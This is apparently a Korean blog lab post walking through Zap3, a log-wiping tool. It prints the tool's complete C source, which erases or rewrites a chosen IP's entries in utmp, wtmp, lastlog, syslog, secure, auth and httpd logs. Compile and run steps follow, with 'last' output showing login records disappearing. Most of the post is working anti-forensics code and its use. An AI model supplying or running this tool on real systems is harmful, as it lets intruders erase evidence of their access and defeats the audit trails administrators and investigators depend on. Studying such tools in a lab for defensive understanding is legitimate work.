실습> 로그 삭제 툴 Zap3 사용하기
!!! 각 IP주소는 다를 수 있으므로 자신의 IP주소로 사용하면 된다. !!!
Zap3
user1 ~ user5 <----- ssh -b로 접속
[Server1]------------[Server2]
192.168.101.254 192.168.101.101, 192.168.101.3 ~ 192.168.101.7
1. 다운로드
packetstormsecurity 사이트에서 로그 삭제 툴을 다운로드 한다.
https://packetstormsecurity.com/files/25380/logcleaner-0.3.c.html
2. 컴파일
# vi Zamp3.c
/*########################################################################
*#### Zap3.c cleans WTMP, UTMP, lastlog, messages, secure, ##############
*#### xferlog, httpd.access_log, httpd.error_log. ##############
*#### Check your log file and edit the source accordingly. ##############
#### Tested in Mandrake 7.2 and 8.0 ##############
*#########################################################################
*#### This program is for educational purposes only ##############
*#### I'm not responsible any damages of this program ##############
*#### Use it with your own risk ##############
*#########################################################################
*#### I change the user based cleaning method ##############
*#### to host based method. Also zap2.c cleans ##############
*#### last entry of wtmp file,i change ##############
*#### this to clean all entries. ##############
*#########################################################################
Copyright (c) darkloop . All rights reserved.
This software is licensed pursuant to the GNU General Public License
version 2 or later versions [or GNU Lesser General Public License],
a copy of which may be viewed at www.gnu.org/copyleft/gpl.html.
*#########################################################################
*#### Please inform me about your comments. ##############
*#### I'm new to c programmin so feel free to flame :) ##############
*#### dark_loop@linuxmail.org ##############
*#### www.solitude2000.f2s.com ##############
*#### 15.10.2001 ##############
*#########################################################################
*/
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#define WTMP_NAME "/var/log/wtmp"
#define UTMP_NAME "/var/run/utmp"
#define LASTLOG_NAME "/var/log/lastlog"
#define MESSAGES "/var/log/messages"
#define SECURE "/var/log/secure"
#define SYSLOG "/var/log/syslog"
#define XFERLOG "/var/log/xferlog"
#define AUTH "/var/log/auth.log"
#define HTTPDA "/var/log/httpd/access_log"
#define HTTPDE "/var/log/httpd/error_log"
#define MAX 1024*5120
#define MIN 1024
void clean_logs(char *host,char *fake);
void clean_utmp(char *host,char *fake);
void clean_wtmp(char *host,char *fake);
void clean_lastlog(char *host,char *fake);
int pos(char *source,char *pattern);
void str_replace(char *source,char *pattern,char *replace);
main(int argc,char **argv)
{
time_t t1,t2;
if (argc<2) {
printf("missing argument\n");
printf("usage :./zap <ip>\n");
exit(1);
} else {
time(&t1);
clean_utmp(argv[1],argv[2]);
clean_wtmp(argv[1],argv[2]);
clean_lastlog(argv[1],argv[2]);
clean_logs(argv[1],argv[2]);
time(&t2);
printf("the process time is %d ms\n",t2-t1);
}
}
void clean_utmp(char *host,char *fake)
{
int f;
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))<0) {
perror("open");
close(f);
}
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
if(fake) {
memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
}else {
memset(&utmp_ent,0,sizeof( utmp_ent ));
}
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
printf("\tcleaning utmp file finished\n\t");
}
void clean_wtmp(char *host,char *fake)
{
struct utmp utmp_ent;
int f;
if ((f=open(WTMP_NAME,O_RDWR))<0) {
perror("open");
close(f);
}
while(read (f, &utmp_ent, sizeof (struct utmp))>0) {
if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
if(fake) {
memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
}else {
memset(&utmp_ent,0,sizeof(struct utmp ));
}
lseek(f,-(sizeof(struct utmp)),SEEK_CUR);
write (f, &utmp_ent, sizeof( utmp_ent ));
}
}
close(f);
printf("cleaning wtmp finished\n\t");
}
void clean_lastlog(char *host,char *fake)
{
int f;
struct lastlog newll;
if ((f=open(LASTLOG_NAME, O_RDWR)) < 0) {
perror("open");
close(f);
} else {
while(read(f,&newll,sizeof(struct lastlog)) > 0 ) {
if(!strncmp(newll.ll_host,host,strlen(host))) {
if(fake) {
memcpy(newll.ll_host,fake,sizeof(newll.ll_host));
}else {
memset(&newll,0,sizeof( newll ));
}
lseek(f, -( sizeof (struct lastlog)),SEEK_CUR);
write(f,&newll, sizeof( newll ));
}
}
close(f);
}
printf("cleaning lastlog finished\n\t");
}
void clean_logs(char *host,char *fake)
{
int i;
char buffer[MIN],buff[MAX];
FILE *fin,*fout;
char *logs[] = {MESSAGES, SECURE,SYSLOG, XFERLOG, AUTH, HTTPDA, HTTPDE} ;
char *modlogs[] = {"modMESSAGES", "modSECURE","modSYSLOG", "modXFERLOG",
"modAUTH","modHTTPDA","modHTTPDE"} ;
i=0;
while(i<7) {
printf("cleaning %s\n\t",logs[i]);
strcpy(buff,"");
if((fin=fopen(logs[i],"r"))==NULL
|| (fout=fopen(modlogs[i],"w"))==NULL) {
perror("fopen");
fclose(fin);
i++;
}
while(fgets(buffer,MIN,fin) !=NULL) {
if(fake) {
if (strstr(buffer,host) ) {
str_replace(buffer,host,fake);
fputs(buffer,fout);
}else
fputs(buffer,fout);
}else {
if(!strstr(buffer,host))
fputs(buffer,fout);
}
}
fclose(fin);
fclose(fout);
if((fout=fopen(logs[i],"w"))==NULL
|| (fin=fopen(modlogs[i],"r"))==NULL) {
perror("fopen");
fclose(fout);
}
while((fgets(buffer,MAX,fin)) !=NULL) {
fputs(buffer,fout);
}
fclose(fin);
fclose(fout);
unlink(modlogs[i]);
i++;
}
printf("cleaning logs file finished\n\t");
}
void str_replace(char *source,char *pattern,char *replace)
{
char buffer[MIN];
char part[MIN];
int n;
while((n=pos(source,pattern))>=0) {
strcpy(buffer,&source[n+strlen(pattern)]);
strcpy(&source[n],replace);
strncpy(part,source,n+strlen(replace));
part[n+strlen(replace)]='\0';
strcat(part,buffer);
strcpy(source,part);
n=pos(source,pattern);
}
}
int pos(char *source,char *pattern)
{
char substring[MIN];
int i=0,found=0,position;
int pattern_len=strlen(pattern);
while(!found && i<= strlen(source) - pattern_len) {
strncpy(substring,&source[i],pattern_len);
substring[pattern_len]='\0';
if(strcmp(substring,pattern)==0)
found=1;
else
++i;
}
if(found)
position=i;
else
position=-1;
return(position);
}
# yum -y install gcc
# gcc -o Zap3 Zap3.c
# ./Zap3
missing argument
usage :./zap <ip>
# ./Zap3 192.168.108.1
cleaning utmp file finished
cleaning wtmp finished
cleaning lastlog finished
cleaning /var/log/messages
cleaning /var/log/secure
cleaning /var/log/syslog
fopen: No such file or directory
세그멘테이션 오류
# w
17:20:34 up 21 min, 0 users, load average: 0.00, 0.01, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
# last
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:20 (00:21)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970
3. 테스트용 IP용 추가
192.168.101.101에 설정한다.
# yum -y install net-tools
ifconfig ens33:1 192.168.101.3
ifconfig ens33:2 192.168.101.4
ifconfig ens33:3 192.168.101.5
ifconfig ens33:4 192.168.101.6
ifconfig ens33:5 192.168.101.7
# ip a
# ifconfig
4. 테스트용 사용자 추가
192.168.101.254에서 user1 ~ user5 사용자를 생성한다.
# useradd user1
# useradd user2
# useradd user3
# useradd user4
# useradd user5
# echo 1 | passwd --stdin user1
# echo 1 | passwd --stdin user2
# echo 1 | passwd --stdin user3
# echo 1 | passwd --stdin user4
# echo 1 | passwd --stdin user5
5. ssh 접속
192.168.101.101 -> 192.168.101.254로 접속한다.
# ssh -b 192.168.101.3 user1@192.168.101.254
$ exit
# ssh -b 192.168.101.4 user2@192.168.101.254
$ exit
# ssh -b 192.168.101.5 user3@192.168.101.254
$ exit
# ssh -b 192.168.101.6 user4@192.168.101.254
$ exit
# ssh -b 192.168.101.7 user5@192.168.101.254
$ exit
# last
user5 pts/1 192.168.101.7 Fri Mar 4 17:51 - 17:51 (00:00)
user4 pts/1 192.168.101.6 Fri Mar 4 17:51 - 17:51 (00:00)
user3 pts/1 192.168.101.5 Fri Mar 4 17:51 - 17:51 (00:00)
user2 pts/1 192.168.101.4 Fri Mar 4 17:51 - 17:51 (00:00)
user1 pts/1 192.168.101.3 Fri Mar 4 17:51 - 17:51 (00:00)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:52 (00:53)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970
6. 로그 삭제
Zap3를 이용해서 각 IP주소를 삭제하고 확인한다.
# ./Zap3 192.168.101.3
192.168.101.3이 삭제된 것을 확인할 수 있다.
# last
user5 pts/1 192.168.101.7 Fri Mar 4 17:51 - 17:51 (00:00)
user4 pts/1 192.168.101.6 Fri Mar 4 17:51 - 17:51 (00:00)
user3 pts/1 192.168.101.5 Fri Mar 4 17:51 - 17:51 (00:00)
user2 pts/1 192.168.101.4 Fri Mar 4 17:51 - 17:51 (00:00)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:53 (00:54)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970
192.168.101.4를 삭제한다.
# ./Zap3 192.168.101.4
192.168.101.4가 삭제된 것을 확인할 수 있다.
# last
user5 pts/1 192.168.101.7 Fri Mar 4 17:51 - 17:51 (00:00)
user4 pts/1 192.168.101.6 Fri Mar 4 17:51 - 17:51 (00:00)
user3 pts/1 192.168.101.5 Fri Mar 4 17:51 - 17:51 (00:00)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:59 - 17:54 (00:55)
reboot system boot 3.10.0-1160.el7. Fri Mar 4 16:56 - 16:58 (00:01)
wtmp begins Thu Jan 1 09:00:00 1970
'Linux > 보안장비 운용' 카테고리의 다른 글
| history (0) | 2022.03.04 |
|---|---|
| /var/log/btmp (0) | 2022.03.04 |
| /var/run/utmp 테스트 (0) | 2022.03.04 |
| /var/log/wtmp 테스트 (0) | 2022.03.04 |
| 시간 동기화 설정하기 (0) | 2022.03.04 |